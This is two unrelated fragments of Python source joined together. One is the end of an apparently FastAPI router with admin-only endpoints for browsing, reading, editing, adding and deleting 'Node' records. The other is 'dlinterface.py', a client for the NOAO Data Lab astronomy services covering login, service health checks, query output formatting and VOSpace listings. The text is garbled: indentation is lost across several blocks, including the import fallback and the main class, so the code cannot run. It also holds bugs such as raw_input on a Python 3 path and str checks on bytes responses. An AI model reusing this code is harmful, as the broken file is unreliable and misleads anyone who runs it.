    reachable_ids = [node.id for group in member_groups for node in group.nodes]
    found = await Node.find({"id": {"$in": reachable_ids}})
    return [node.export() for node in found]
@router.post("/browse", dependencies=[Depends(admin_only)])
async def browse_nodes(find: NodeFind) -> List[Node]:
    """Return every node matching the given filter (admin only)."""
    criteria = find.dict(exclude_unset=True)
    return await Node.find(find=criteria)
@router.post("/read", dependencies=[Depends(admin_only)])
async def read_node(find: NodeFind, with_contents: bool = Body(False), with_other_contents: bool = Body(False)):
    """Fetch one node; optionally include its contents and/or every other content."""
    node = await Node.find_one(find=find.dict(exclude_unset=True))
    result = node.dict()
    if with_contents:
        owned_ids = [content.id for content in node.contents]
        result["contents"] = await Content.find({"id": {"$in": owned_ids}})
    if with_other_contents:
        owned_ids = [content.id for content in node.contents]
        result["other_contents"] = await Content.find({"id": {"$nin": owned_ids}})
    return result
@router.post("/edit", dependencies=[Depends(admin_only)])
async def edit_node(find: NodeFind, data: NodeEdit):
    """Update the first node matching *find* with the fields set in *data* (admin only)."""
    # Removed leftover debug print() statements that polluted stdout.
    return await Node.find_one_and_set(find=find.dict(exclude_unset=True),
                                       data=data.dict(exclude_unset=True))
@router.post("/add", dependencies=[Depends(admin_only)])
async def add_node(data: NodeAdd):
    """Create a new node from the provided fields (admin only)."""
    payload = data.dict(exclude_unset=True)
    return await Node.insert_one(data=payload)
@router.post("/delete", dependencies=[Depends(admin_only)])
async def delete_node(find: NodeFind):
    """Delete the first node matching the filter (admin only)."""
    criteria = find.dict(exclude_unset=True)
    return await Node.delete_one(find=criteria)
|
#!/usr/bin/env python
#
# DLINTERFACE.PY -- Python interactive interface to the Data Lab services.
#
#from __future__ import print_function
__authors__ = '<NAME> <<EMAIL>>, <NAME> <<EMAIL>>, <NAME> <<EMAIL>>, \
<NAME> <<EMAIL>>, Data Lab <<EMAIL>>'
__version__ = '20170531' # yyyymmdd
"""
Python interactive interface to the Data Lab services.
Import via
.. code-block:: python
from dl.dlinterface import Dlinterface
"""
import os
from subprocess import Popen, PIPE
import time
try:
import ConfigParser
from urllib import quote_plus, urlencode # Python 2
from urllib2 import urlopen, Request # Python 2
from cStringIO import StringIO
except ImportError:
import configparser as ConfigParser # Python 3
from urllib.parse import quote_plus, urlencode # Python 3
from urllib.request import urlopen, Request # Python 3
from io import StringIO
import requests
from io import BytesIO
# std lib imports
import getpass
import xml.etree.ElementTree as ET
import numpy as np
import tempfile
from functools import partial
import warnings
from astropy.utils.exceptions import AstropyWarning
# use this for SIA service for now
from pyvo.dal import sia
# Data Lab Client interfaces
from dl import authClient, storeClient, queryClient
DAEMON_TIMEOUT = 60                             # Mount timeout (seconds)
CAPS_DIR = "../caps"                            # Capability directory
ANON_TOKEN = "anonymous.0.0.anon_access"        # default (anonymous) auth token
# Service URLs
AM_URL = "http://dlsvcs.datalab.noao.edu/auth"          # Auth Manager
SM_URL = "http://dlsvcs.datalab.noao.edu/storage"       # Storage Manager
QM_URL = "http://dlsvcs.datalab.noao.edu/query"         # Query Manager
# SIA service
#SIA_DEF_ACCESS_URL = "http://datalab.noao.edu/sia/smash"
SIA_DEF_ACCESS_URL = "http://datalab.noao.edu/sia"
SIA_DEF_SIZE = 0.0085                           # default search size (degrees)
def getUserName (self):
    ''' Get the currently logged-in user name. If we haven't logged in
        return the anonymous username.
    '''
    # could also use self.loginuser
    user = self.dl.get("login", "user")
    if user is None or user == '':
        return "anonymous"
    return user
def getUserToken (self):
    ''' Get the currently logged-in user token. If we haven't logged in
        return the anonymous token.
    '''
    token = self.dl.get("login", "authtoken")
    if token is None or token == '':
        return ANON_TOKEN
    return token
def checkLogin (self):
    ''' Check if the user is already logged in. If not, give a warning message
    '''
    # NOTE(review): with 'and', an anonymous user always passes this check
    # even when not logged in — confirm that is intended.
    if self.loginstatus != 'loggedin' and self.loginuser != 'anonymous':
        print ("You are not currently logged in. Please use dl.login() to do so.")
        return False
    return True
def areSyncQueriesWorking ():
    ''' This checks if the Query Manager is returning proper Sync queries.
    '''
    queryworking = False  # dead until proven alive
    if queryClient.isAlive() is True:
        # Do simple query with timeout
        headers = {'Content-Type': 'text/ascii', 'X-DL-AuthToken': ANON_TOKEN}
        query = quote_plus('select ra,dec from smash_dr1.object limit 2')
        dburl = '%s/query?sql=%s&ofmt=%s&out=%s&async=%s' % (
            "http://dlsvcs.datalab.noao.edu/query", query, "csv", None, False)
        try:
            r = requests.get(dburl, headers=headers, timeout=1)
        except:
            # Any request failure simply leaves queryworking False.
            pass
        else:
            # Check that the output looks right
            # NOTE(review): under Python 3 requests' r.content is bytes, so
            # this str check can never be True — confirm whether r.text was
            # intended for Python 3 support.
            if type(r.content) == str and len(r.content.split('\n')) == 4 and r.content[0:6] == 'ra,dec':
                queryworking = True
    return queryworking
def isTapWorking ():
    ''' This checks if the TAP service and Tomcat are running.
    '''
    tapworking = True  # True to start and many ways to make it False
    # Check if the availability/tables endpoint is working
    try:
        #request = Request("http://datalab.noao.edu/tap/avail")
        request = Request("http://datalab.noao.edu/tap/tables")
        response = urlopen(request, timeout=2).read()
        # The full read request of tables take a couple seconds, just
        # try to get the header
        #r = requests.head("http://datalab.noao.edu/tap/tables",timeout=2)
    except:
        # Timeout or HTTP error: service considered down.
        tapworking = False
    else:
        tapworking = (tapworking if response is not None else False)
    # Check if the Tomcat service is responding
    try:
        request = Request("http://gp01.datalab.noao.edu:8080/")
        response = urlopen(request, timeout=1).read()
    except:
        tapworking = False
    else:
        tapworking = (tapworking if response is not None else False)
    return tapworking
def areLoginsWorking():
    ''' This checks if the Authentication Manager is returning proper tokens.
    '''
    authworking = False  # dead until proven alive
    if authClient.isAlive() is True:
        # Do simple token request
        url = "http://dlsvcs.datalab.noao.edu/auth/login?"
        query_args = {"username": "datalab", "password": "<PASSWORD>",
                      "profile": "default", "debug": False}
        try:
            r = requests.get(url, params=query_args, timeout=1)
        except:
            # Any request failure simply leaves authworking False.
            pass
        else:
            # Check that the output looks right
            # NOTE(review): `response` is assigned but unused — r.content is
            # checked below instead. Also, under Python 3 r.content is bytes,
            # so this str check can never be True; confirm r.text was intended.
            response = r.text
            if type(r.content) == str and r.content[0:7] == 'datalab':
                authworking = True
    return authworking
def isListWorking():
    ''' Check whether the Storage Manager answers simple list queries.

    Returns
    -------
    storeworking : bool
        True if the anonymous "ls" request returns a string payload
        within the timeout, False otherwise.
    '''
    storeworking = False  # dead until proven alive
    if storeClient.isAlive() is True:
        # Do simple list query with a short timeout
        url = "http://dlsvcs.datalab.noao.edu/storage/ls?name=vos://&format=csv"
        try:
            r = requests.get(url, headers={'X-DL-AuthToken': ANON_TOKEN}, timeout=1)
        except Exception:
            # Best-effort probe: a network failure just leaves storeworking False.
            # Narrowed from a bare except so Ctrl-C / SystemExit still propagate.
            pass
        else:
            # Check that the output looks right
            if type(r.content) == str:
                storeworking = True
    return storeworking
def addFormatMapping(self):
    ''' Attach the query-output format mapping to the DL object.

    Each key is a user-facing output format name; the value is a tuple of
    (queryClient fmt value, descriptive title, converter applied to the
    raw result buffer).
    '''
    from collections import OrderedDict
    from pandas import read_csv
    from astropy.table import Table
    from astropy.io.votable import parse_single_table

    entries = [
        ('csv', ('csv', 'CSV formatted table as a string', lambda x: x.getvalue())),
        ('ascii', ('ascii', 'Tab-delimited table as a string', lambda x: x.getvalue())),
        ('array', ('csv', 'Numpy array',
                   partial(np.loadtxt, unpack=False, skiprows=1, delimiter=','))),
        ('structarray', ('csv', 'Numpy structured / record array',
                         partial(np.genfromtxt, dtype=float, delimiter=',', names=True))),
        ('pandas', ('csv', 'Pandas dataframe', read_csv)),
        ('table', ('csv', 'Astropy Table', partial(Table.read, format='csv'))),
        ('votable', ('votable', 'Astropy VOtable', parse_single_table)),
    ]
    self.fmtmapping = OrderedDict(entries)
def reformatQueryOutput(self, res=None, fmt='csv', verbose=True):
    ''' Reformat the raw string output of a query into the requested format.

    Parameters
    ----------
    res : str
        The raw query result string (e.g. CSV text).
    fmt : str
        The desired output format; must be a key of self.fmtmapping.
    verbose : bool
        If True, print the descriptive name of the returned format.

    Returns
    -------
    output
        The converted result (type depends on ``fmt``), or "" on missing
        input or unsupported format.
    '''
    # Not enough inputs
    if res is None:
        # Fixed: the usage message previously lacked its closing parenthesis.
        print ("Syntax - reformatQueryOutput(dl, results, fmt='csv')")
        return ""
    # Add the mapping information if not already loaded
    if self.fmtmapping is None:
        addFormatMapping(self)
    mapping = self.fmtmapping
    # Check that this format is supported ("in mapping" avoids building keys())
    if fmt not in mapping:
        print ("Format %s not supported." % fmt)
        return ""
    # Convert to the desired format: the converters read from a file-like
    # buffer, so wrap the encoded result string.
    s = BytesIO(res.encode())
    output = mapping[fmt][2](s)
    if verbose is True:
        print ("Returning %s" % mapping[fmt][1])
    return output
def convert_vospace_time_to_seconds(str_date):
    """Convert a VOSpace time-field string to seconds since the Unix epoch.

    :param str_date: time string such as '2017-05-16T13:27:34.123'
    :type str_date: str
    :return: seconds since the epoch (local-time interpretation via mktime)
    :rtype: float
    """
    # Keep everything through the two digits after the last ':' so that
    # fractional seconds and any trailing suffix are discarded.
    cutoff = str_date.rfind(":") + 3
    parsed = time.strptime(str_date[:cutoff], '%Y-%m-%dT%H:%M:%S')
    return time.mktime(parsed)
def getNodeInfo(self, xnode, lenpathbase, verbose=True):
    ''' Collect information on a VOSpace node.

    Parameters
    ----------
    xnode : xml.etree.ElementTree.Element
        A "node" element of the VOSpace XML tree.
    lenpathbase : int
        Number of leading characters of the node URI to strip off when
        forming the short name.
    verbose : bool
        If True, also fill in the human-readable fields (size, date,
        permissions string, decorated name).

    Returns
    -------
    vals : dict
        Dictionary of node attributes (uri, type, name, size, time,
        permissions, ...).  Non-verbose calls leave the display fields
        at their defaults.
    '''
    # Gather up all the necessary information for this node
    vals = {'uri':'', 'type':'', 'length':'', 'MD5':'',
            'target':'', 'date':'', 'ispublic':'', 'caps':'',
            'groupread':None, 'groupwrite':None, 'is_public':None,
            'name':'', 'verbosename':'', 'size':'', 'permissions':''}
    vals['uri'] = xnode.get('uri')
    # The xsi:type attribute distinguishes container/link/data nodes
    vals['type'] = xnode.get('{http://www.w3.org/2001/XMLSchema-instance}type')
    abspathbase = 'vos://datalab.noao!vospace/'+getUserName(self)+'/'
    lenabspathbase = len(abspathbase)
    # Short name: the URI with the common path prefix removed
    vals['name'] = vals['uri'][lenpathbase:]
    # Gather more information for verbose output
    if verbose is True:
        # Loop over properties/accepts/provides/capabilities/nodes
        for p in xnode:
            if (p.tag.endswith('target') is True):
                vals['target'] = p.text
            # Loop over "children"; note the conditions below test the
            # PARENT tag (p), so each child is handled according to the
            # section it lives in.
            for ch in p:
                if (p.tag.endswith('properties') is True) and (len(p) > 0):
                    # Property URIs look like '...#<propname>'; the fragment
                    # becomes the dict key (e.g. 'length', 'date', 'ispublic')
                    churi = ch.get('uri')
                    n = churi.split('#')[1]
                    vals[n] = ch.text
                if (p.tag.endswith('capabilities') is True) and (len(p) > 0):
                    # Accumulate capability names as a comma-separated string
                    churi = ch.get('uri')
                    cap = churi.split('#')[1]
                    if vals['caps'] == '':
                        vals['caps'] = cap
                    else:
                        vals['caps'] = vals['caps']+','+cap
        # Parse the information a bit more
        vals['verbosename'] = vals['name']
        if vals['type'] == 'vos:ContainerNode':
            vals['verbosename'] += '/'
        if vals['type'] == 'vos:LinkNode':
            # Show link targets relative to the user's VOSpace root
            target = vals['target'][lenabspathbase:]
            vals['verbosename'] += ' -> /'+target  # absolute path
        # Human-readable size (only when 'length' parsed as an integer)
        size = vals['length']
        if (type(size) is int) or (type(size) is str and size.isdigit() is True):
            size = storeClient.sizeof_fmt(int(size))
        vals['size'] = size
        # Better date
        modified_time = convert_vospace_time_to_seconds(vals['date'])
        vals['time'] = time.strftime("%d %b %Y %H:%M:%S", time.localtime(modified_time))
        # Create the ls-style permissions string (10 chars: type + rwx triples)
        perm = []
        for i in range(10):
            perm.append('-')
        perm[1] = 'r'
        perm[2] = 'w'
        if vals['type'] == "vos:ContainerNode":
            perm[0] = 'd'
        if vals['type'] == "vos:LinkNode":
            perm[0] = 'l'
        #if self.props.get('ispublic', "false") == "true":
        if vals['ispublic'] == "true":
            perm[-3] = 'r'
            perm[-2] = '-'
        #write_group = self.props.get('groupwrite', '') # MJG
        #if write_group != '':
        # NOTE(review): default for 'groupwrite'/'groupread' is None, which
        # also satisfies "!= ''" -- confirm whether that is intended.
        if vals['groupwrite'] != '':
            perm[5] = 'w'
        #read_group = self.props.get('groupread', '')
        #if read_group != '':
        if vals['groupread'] != '':
            perm[4] = 'r'
        vals['permissions'] = ''.join(perm)
    # Return the dictionary of values
    return vals
def writeAscii(filename, txt):
    ''' Write data to an ASCII file.

    Parameters
    ----------
    filename : str
        Name of the file to (over)write.
    txt : bytes or str
        The data to write; the file is opened in binary mode.
    '''
    # "with" guarantees the handle is flushed and closed even if the
    # write raises (the original leaked the handle on error).
    with open(filename, 'wb') as fd:
        fd.write(txt)
def readAscii(filename):
    ''' Read an ASCII file (or open file handle) and return its contents.

    Parameters
    ----------
    filename : str or file-like
        A file name to open, or an already-open file object.  Either way
        the file is closed before returning (closing caller-supplied
        handles preserves the historical behavior).

    Returns
    -------
    data : str
        The full contents of the file.
    '''
    if type(filename) is str:
        # We own this handle: the context manager closes it even if
        # read() raises (the original leaked it on error).
        with open(filename, 'r') as fd:
            return fd.read()
    # Caller-supplied handle: read then close it, as before
    data = filename.read()
    filename.close()
    return data
def convertTableToFormat(t,format):
    ''' Serialize an Astropy table to a string in the given format.

    Writes through the table's own write() method into an in-memory
    buffer and returns the buffer contents.
    '''
    buf = StringIO()
    t.write(buf, format=format)
    return buf.getvalue()
#class Node:
# '''
# A class to hold node information.
# '''
# def __init__(self, xnode):
# self.uri = None
# self.type = None
# self.length = None
# self.MD5 = None
# self.target = ''
# self.date = ''
# self.groupread = None
# self.groupwrite = None
# self.is_public = None
# self.islocked = None
# self.caps = ''
# self.name = ''
# self.verbosename = ''
# self.size = ''
# self.permissions = ''
#
# def isdir(self):
# ''' Determine if this node is a directory.
# '''
# return (True if self.type == 'vos:ContainerNode' else False)
#
# def islink(self):
# ''' Determine if this node is a link.
# '''
# return (True if self.type == 'vos:LinkNode' else False)
#
# def getPerms(self):
# ''' Get the permissions string.
# '''
# perm = []
# for i in range(10):
# perm.append('-')
# perm[1] = 'r'
# perm[2] = 'w'
# if self.type == "vos:ContainerNode":
# perm[0] = 'd'
# if self.type == "vos:LinkNode":
# perm[0] = 'l'
# #if self.props.get('ispublic', "false") == "true":
# if self.ispublic == "true":
# perm[-3] = 'r'
# perm[-2] = '-'
# #write_group = self.props.get('groupwrite', '') # MJG
# #if write_group != '':
# if self.groupwrite != '':
# perm[5] = 'w'
# #read_group = self.props.get('groupread', '')
# #if read_group != '':
# if self.groupread != '':
# perm[4] = 'r'
# return string.join(perm, '')
class DLInteract:
    '''
    Main class for Data Lab interactions: owns the per-user configuration
    file stored at $HOME/.datalab/dl.conf.
    '''

    def __init__(self):
        self.home = '%s/.datalab' % os.path.expanduser('~')

        # Check that $HOME/.datalab exists
        if not os.path.exists(self.home):
            os.makedirs(self.home)

        # See if datalab conf file exists; create a default one if not
        self.config = ConfigParser.RawConfigParser(allow_no_value=True)
        if not os.path.exists('%s/dl.conf' % self.home):
            self.config.add_section('datalab')
            self.config.set('datalab', 'created', time.strftime(
                '%Y-%m-%d %H:%M:%S', time.gmtime()))
            self.config.add_section('login')
            self.config.set('login', 'status', 'loggedout')
            self.config.set('login', 'user', '')
            self.config.add_section('vospace')
            self.config.set('vospace', 'mount', '')
            self._write()
        else:
            self.config.read('%s/dl.conf' % self.home)
        # (Removed a dead local: CAPS_DIR was assigned from the environment
        # here but never used anywhere in the class.)

    def save(self, section, param, value):
        ''' Set a configuration value and persist the file to disk. '''
        if not self.config.has_section(section):
            self.config.add_section(section)
        self.config.set(section, param, value)
        self._write()

    def get(self, section, param):
        ''' Get a value from the configuration file. '''
        return self.config.get(section, param)

    def _write(self):
        ''' Write out the configuration file to disk. '''
        with open('%s/dl.conf' % self.home, 'w') as configfile:
            self.config.write(configfile)
#### Main Data Lab Interface Class and method #####
class Dlinterface:
'''
Data Lab python interface super-class with methods for each command.
'''
def __init__(self, verbose=True):
dlinteract = DLInteract()
self.dl = dlinteract
self.loginstatus = "loggedout"
self.loginuser = ""
#self.logintoken = ""
self.verbose = verbose
self.fmtmapping = None
self.qhistory = None
if verbose is True:
print ("Welcome to the Data Lab python interface. Type dl.help() for help.")
'''
Print method, just print the help
'''
    def __str__(self):
        '''Printing the object prints the interactive help; a single
        space is returned so the interpreter shows nothing extra.'''
        self.help()
        return " "
#### HELP ########
    def help(self, command=None):
        '''
        Print out useful help information on the Data Lab python interface
        and its commands.

        Parameters
        ----------
        command : str or None
            Name of a specific method to describe (its docstring is shown
            via the builtin help()).  If None, a general command summary
            is printed.
        '''
        # Print out general help information
        if command is None:
            print ("The Data Lab python interface.")
            print (" ")
            print ("The available commands are:")
            print (" ")
            print ("dl.help() - Helpful information")
            print ("Use dl.help(<command>) for specific help on a command.")
            print (" ")
            print ("-- Login and authentication --")
            print ("dl.login() - Login to the Data Lab")
            print ("dl.logout() - Logout of the Data Lab")
            print ("dl.status() - Report on the user status")
            print ("dl.whoami() - Print the current active user")
            print ("dl.servicestatus() - Report on the status of the DL services")
            print (" ")
            print ("-- File system operations --")
            print ("dl.ls() - List a location in Data Lab VOSpace")
            print ("dl.get() - Get a file from Data Lab VOSpace")
            print ("dl.put() - Put a file into Data Lab VOSpace")
            print ("dl.cp() - Copy a file in Data Lab VOSpace")
            print ("dl.mv() - Move a file in Data Lab VOSpace")
            print ("dl.rm() - Delete a file in Data Lab VOSpace")
            print ("dl.mkdir() - Create a directory in Data Lab VOSpace")
            print ("dl.rmdir() - Delete a directory in Data Lab VOSpace")
            print ("dl.ln() - Link a file in Data Lab VOSpace")
            print ("dl.load() - Load data from a local or VOSpace file")
            print ("dl.save() - Save data to a local or VOSpace file")
            print ("dl.copyurl() - Copy a file from a URL to Data Lab VOSpace")
            print (" ")
            print ("-- Query and database operations --")
            print ("dl.query() - Query a remote data service in the Data Lab")
            print ("dl.queryhistory() - List history of queries made")
            print ("dl.queryresults() - Get the async query results")
            print ("dl.querystatus() - Get an async query job status")
            print ("dl.queryprofiles() - List the available query profiles")
            print ("dl.schema() - Get information on database schemas")
            print ("dl.droptable() - Drop a user MyDB table")
            print ("dl.exporttable() - Copy a user MyDB table to a VOSpace CSV file")
            print ("dl.listdb() - List the user MyDB tables")
            print ("dl.siaquery() - Query a SIA service in the Data Lab")
        # Help on a specific command
        else:
            # Look the command up on this instance; None if not a method
            cmd = getattr(self, command, None)
            if cmd is not None:
                #print cmd.__doc__
                help(cmd)
            else:
                print ("%s is not a supported command." % command)
def servicestatus(self):
'''
This checks on the status of the DL services.
'''
# Check the Auth Manager
if areLoginsWorking() is True:
print ("Authentication - ALIVE")
else:
print ("Authentication - DEAD")
# Check that SYNC queries are working
if areSyncQueriesWorking() is True:
print ("SYNC queries - ALIVE")
else:
print ("SYNC queries - DEAD")
# Check that ASYNC queries and TAP are working
if isTapWorking() is True:
print ("ASYNC queries - ALIVE")
else:
print ("ASYNC queries - DEAD")
# Check the Storage Manager
if isListWorking() is True:
print ("Storage - ALIVE")
else:
print ("Storage - DEAD")
################################################
# Account Login Tasks
################################################
    def login(self, user=None):
        '''
        Login to Data Lab using username.

        Parameters
        ----------
        user : str
            The Data lab username. If this is not given, then the user will be
            prompted for the information.

        Example
        -------
        .. code-block:: python

            Login and give the username,

            dl.login('myusername')
            Enter password: *******
            Welcome to the Data Lab, myusername

            or,

            dl.login()
            Enter user: myusername
            Enter password: ******
            Welcome to the Data Lab, myusername
        '''
        # Check if we are already logged in.  The 'user' field of the
        # configuration contains the currently active user and token,
        # however previous logins will have preserved tokens from other
        # accounts we may be able to use.
        DOLOGIN = True  # login by default
        # Already logged in
        if self.loginstatus == "loggedin":
            _user = self.dl.get("login", "user")
            # Same username
            if user == _user:
                # See whether current token is still valid for this user;
                # if it expired we force a fresh login.
                _token = self.dl.get("login", "authtoken")
                if not authClient.isValidToken (_token):
                    print ("Current token for User '%s' no longer valid. Please login again." % user)
                    DOLOGIN = True
                else:
                    DOLOGIN = False
                    print ("User '%s' is already logged in to the Data Lab" % user)
            # No username given while someone is logged in: keep the session
            elif user is None:
                DOLOGIN = False
                print ("User '%s' is already logged in to the Data Lab" % user)
            # Different username
            else:
                # We're logging in as a different user.
                print ("You are currently logged in as user '%s'. Switching to %s." % (_user, user))
                DOLOGIN = True
        # Not logged in
        else:
            DOLOGIN = True
        # Do the login via the authClient
        if DOLOGIN is True:
            if user == None or user == '':
                user = raw_input('Enter user: ')
            if user == 'anonymous':
                if self.loginstatus == 'loggedin':  # logout previous user first
                    self.logout(verbose=False)
                # Anonymous logins need no password
                token = authClient.login('anonymous','')
                self.loginuser = user
            else:
                token = authClient.login(user,getpass.getpass(prompt='Enter password: '))
                if not authClient.isValidToken(token):
                    print ("Invalid user name and/or password provided. Please try again.")
                    return
                else:
                    self.loginuser = user
                    print ("Welcome to the Data Lab, %s" % user)
            #print "Authentication successful."
            # Persist the session: active user/token plus a per-user token
            # entry so earlier sessions can be resumed.
            self.dl.save("login", "status", "loggedin")
            self.dl.save("login", "user", user)
            self.dl.save("login", "authtoken", token)
            self.dl.save(user, "authtoken", token)
            self.loginstatus = "loggedin"
            #self.user = user
            #self.token = token
        return
def logout(self, unmount=None, verbose=True):
'''
Logout out of the Data Lab.
Example
-------
Logout of Data Lab.
.. code-block:: python
dl.logout()
'myusername' is now logged out of the Data Lab
'''
if self.loginstatus == 'loggedout':
print ("No user is currently logged into the Data Lab")
return
else:
token = getUserToken(self)
user, uid, gid, hash = token.strip().split('.', 3)
res = authClient.logout (token)
if res != "OK":
print ("Error: %s" % res)
return
self.dl.save("login", "status", "loggedout")
self.dl.save("login", "user", "")
self.dl.save("login", "authtoken", "")
if verbose is True:
print ("'%s' is now logged out of the Data Lab" % user)
self.loginstatus = "loggedout"
#self.user = ""
#self.token = ""
def status(self):
'''
Print the status of the Data Lab connection.
Example
-------
The "myusername" is logged in.
.. code-block:: python
dl.status()
User myusername is logged into the Data Lab
No user is currently logged in.
.. code-block:: python
dl.status()
No user is currently logged into the Data Lab
'''
if self.loginstatus == "loggedout":
print ("No user is currently logged into the Data Lab")
else:
print ("User %s is logged into the Data Lab" % \
self.dl.get("login", "user"))
def whoami(self):
'''
Print the current active user.
Example
-------
.. code-block:: python
dl.whoami()
myusername
'''
print (getUserName(self))
################################################
# Query Manager Tasks
################################################
    def query(self, query=None, qtype='sql', fmt='csv', out=None, async_=False, profile='default', verbose=True, **kw):
        '''
        Send a query to a remote query service.

        Parameters
        ----------
        query : str
            The query string that will be passed to the queryClient and then
            to the DB query manager.  This can either be in the SQL or
            ADQL format (specified by the "type" parameter).  For example,

            .. code-block:: python

                'select ra,dec from gaia_dr1.gaia_source limit 3'

        qtype : str
            The query format, SQL or ADQL.  SQL is used by default.

        fmt : str
            Format of the result to be returned by the query. Permitted values are.
            For file output and direct output to python:
              * 'csv'     the returned result is a comma-separated string that looks like a csv file (newlines at the end of every row)
              * 'ascii'   same as csv but tab-delimited
              * 'votable' result is a string XML-formatted as a VO table
            Only for direct output to python:
              * 'array'       Numpy array
              * 'structarray' Numpy structured / record array
              * 'pandas'      a Pandas data frame
              * 'table'       in Astropy Table format
            Only for file output:
              * 'fits'    FITS binary table.  Only if the results are saved to a file with out=.
              * 'hdf5'    HDF5 file.  Only if the results are saved to a file with out=.

        out : str or None
            The output name if the results are to be saved to mydb (mydb://tablename), to VOSpace (vos://filename),
            or the local file system (file:// and other names with no prefix).  The files are in csv format.

        async_ : bool
            If ``True``, the query is asynchronous, i.e. a job is
            submitted to the DB, and a jobID is returned.  The jobID
            must be then used to check the query's status and to retrieve
            the result (when status is ``COMPLETE``).  Default is
            ``False``, i.e. synchroneous query.

            ``async_`` replaces the previous ``async`` parameter, because ``async``
            was promoted to a keyword in Python 3.7.  Users of Python versions
            prior to 3.7 can continue to use the ``async`` keyword.

        Returns
        -------
        result : str
            If ``async_=False`` and ``out`` is not used, then the return value is the result of the query
            in the requested format (see ``fmt``).  If ``out`` is given then the query result is saved to
            a file or mydb.  If ``async_=True`` the jobID is returned with which later the asynchronous
            query's status can be checked (:func:`dl.querystatus()`), and the result retrieved (see
            :func:`dl.queryresults()`.

        Example
        -------
        A simple query returned as a pandas data frame.

        .. code-block:: python

            data = dl.query('SELECT * from smash_dr1.source LIMIT 100',fmt='pandas')
            Returning Pandas dataframe

            type(data)
            pandas.core.frame.DataFrame

            print data['ra'][0:3]
            0    103.068355
            1    103.071774
            2    103.071598

        Perform a query and save the results to a table called "table1.txt" in mydb.

        .. code::

            res = dl.query('SELECT * from smash_dr1.source LIMIT 100',out='mydb://table1.txt')

            dl.listmydb()

        Perform the same query and save it to a local file.

        .. code::

            res = dl.query('SELECT * from smash_dr1.source LIMIT 100',out='table1.txt')

            ls
            table1.txt
        '''
        # Process optional keyword arguments: accept the legacy 'async'
        # keyword for pre-3.7 callers.
        if 'async' in kw:
            async_ = kw['async']
        # Not enough information input
        if (query is None):
            print ("Syntax - dl.query(query, qtype='sql|adql', fmt='csv|ascii|array|structarray|pandas|table|votable|fits|hdf5',")
            print (" out='', async_=False, profile='default')")
            return
        # Check if we are logged in
        if not checkLogin(self):
            return
        token = getUserToken (self)
        # Check if the source file actually exist
        if out is not None and not out.startswith('mydb://'):
            # Refuse to clobber an existing output file/vos object
            res = storeClient.ls(token,out,'csv')
            if res != '':
                print ("'%s' already exists." % out)
                return
        # Can only use FITS or HDF for file output
        if (out is None or out == '') and fmt in ['fits','hdf5']:
            print ("Can only use format '%s' for file output." % fmt)
            return
        # Cannot use pandas, array, structarray for file output
        if (out is not None and out != '') and fmt in ['pandas','array','structarray','table']:
            print ("Cannot use format '%s' for file output." % fmt)
            return
        # Use QID to rerun a previous query: an integer (or digit string)
        # is looked up in the in-memory query history.
        if (type(query) is int) or (type(query) is str and query.isdigit() is True):
            queryid = int(query)
            keys = sorted(self.qhistory.keys())
            if ((queryid in keys) is False):  # no QID
                print ("QID = %s not found" % str(queryid))
                return
            print ("Rerunning QID = %d" % queryid)
            v = self.qhistory[queryid]
            # qid, type, async_, query, time, jobid, username, format, status/nrows
            query = v[3]
            print ("Query = '%s'" % query)
        # Check type
        if qtype not in ['sql','adql']:
            print ("Only 'sql' and 'adql' queries are currently supported.")
            return
        _query = query  # local working copy
        # Check if the query is in a file; if so, read its contents as the query
        if os.path.exists (_query):
            with open (_query, "r", 0) as fd:
                _query = fd.read (os.path.getsize(_query)+1)
            fd.close()
        # What type of query are we doing: exactly one of sql/adql is set
        sql = None
        adql = None
        if qtype == 'sql':
            sql = _query
        else:
            adql = _query
        # Add the mapping information if not already loaded
        if (out is None or out == '') and (self.fmtmapping is None):
            addFormatMapping(self)
        mapping = self.fmtmapping
        # The queryClient "fmt" will depend on the requested output format
        if (out is None or out == ''):
            try:
                qcfmt = mapping[fmt][0]
            except:
                print ("Format '%s' not supported." % fmt)
                return
        else:
            # File output always goes through csv server-side
            qcfmt = 'csv'
        # Execute the query.
        if profile != "default":
            if profile != "" and profile is not None:
                queryClient.set_profile (profile=profile)
        try:
            res = queryClient.query (token, adql=adql, sql=sql,
                                     fmt=qcfmt, out=out, async_=async_)
        except Exception as e:
            # Give a friendlier message for sync-query timeouts
            if not async_ and str(e) is not None:
                err = str(e)
                if err.find("Time-out") >= 0:
                    print ("Error: Sync query timeout, try an async query")
                else:
                    print (str(e))
            else:
                print (str(e))
        else:
            # Add this query to the query history
            jobid = None
            status = ''
            if (out is None or out == '') and (not async_):  # regular sync query
                status = len(res.split('\n'))-2  # number of rows returned
            if (out is not None) and (out != '') and (not async_):
                status = res  # sync query to file, vos, or mydb
            if async_:
                jobid = res
                status = 'SUBMITTED'
            # History entries are tuples:
            # (qid, type, async_, query, time, jobid, username, format, status/nrows)
            if self.qhistory is None:
                qid = 1
                self.qhistory = {qid : (qid, qtype, async_, _query, time.time(), jobid, getUserName(self), fmt, status)}
            else:
                qid = int(max(self.qhistory.keys())) + 1
                self.qhistory[qid] = (qid, qtype, async_, _query, time.time(), jobid, getUserName(self), fmt, status)
            # Return the results
            # Asynchronous
            if async_:
                print ("Asynchronous query JobID = %s " % res)  # Return the JobID
                return res
            # Synchronous
            elif out == '' or out is None:
                # Convert to the desired format
                return reformatQueryOutput(self,res,fmt,verbose=verbose)
    def queryhistory(self, async_=None, **kw):
        '''
        Report the history of queries made so far.

        Parameters
        ----------
        async : bool
            A boolean (True/False) of whether to only show the ASYNC queries.
            By default all queries are shown.

            ``async_`` replaces the previous ``async`` parameter, because ``async``
            was promoted to a keyword in Python 3.7.  Users of Python versions
            prior to 3.7 can continue to use the ``async`` keyword.

        Results
        -------
        The information on past queries is output to the screen with the following
        columns: query ID, submission time, query type (sql/adql), sync or async query,
        jobid (for async queries), output format, status of query (or number of
        returned rows if sync query), query string

        Examples
        --------
        Perform some queries and then list the history.

        .. code-block:: python

            data1 = dl.query('select ra,dec from smash_dr1.source limit 100',fmt='csv')
            Returning CSV formatted table as a string

            data2 = dl.query('select ra,dec from smash_dr1.source limit 500',fmt='pandas')
            Returning Pandas dataframe

            data3 = dl.query('select ra,dec from smash_dr1.source limit 1000',fmt='structarray')
            Returning Numpy structured / record array

            dl.queryhistory()
            1  2017-05-16 13:27:34  sql  SYNC  pandas  100  --  'select ra,dec,gmag from smash_dr1.object limit 100'
            2  2017-05-16 13:27:40  sql  SYNC  csv  500  --  'select ra,dec,gmag from smash_dr1.object limit 500'
            3  2017-05-16 13:27:46  sql  SYNC  structarray  1000  --  'select ra,dec,gmag from smash_dr1.object limit 1000'
        '''
